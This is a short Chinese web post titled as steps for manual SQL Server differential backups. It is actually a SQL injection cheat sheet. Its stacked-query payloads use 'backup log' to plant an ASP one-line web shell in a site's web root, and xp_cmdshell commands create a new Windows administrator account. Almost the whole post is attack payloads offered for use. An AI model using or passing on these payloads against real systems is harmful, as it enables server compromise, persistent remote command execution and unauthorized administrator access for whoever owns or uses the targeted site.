sqlserver手工实现差异备份的步骤

sqlserver 手工实现差异备份的步骤,需要的朋友可以参考下。

字符型：

1、恢复当前库
;alter database 当前库 set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 创建的表--

数字型

1、恢复当前库
';alter database 当前库 set RECOVERY FULL--

2、创建表cmd
';create table cmd (a image)--

3、备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 创建的表--

sa权限创建管理员用户

1、判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2、添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遥复仇：有工具我是一定不会手工的，麻烦。